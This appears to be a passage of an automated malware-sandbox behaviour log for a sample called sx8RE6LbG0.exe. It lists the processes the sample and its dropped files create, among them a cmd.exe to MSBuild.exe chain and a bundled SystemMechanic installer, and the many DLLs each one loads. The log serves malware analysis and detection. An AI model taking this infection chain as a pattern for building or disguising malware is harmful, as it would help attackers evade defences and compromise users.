Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
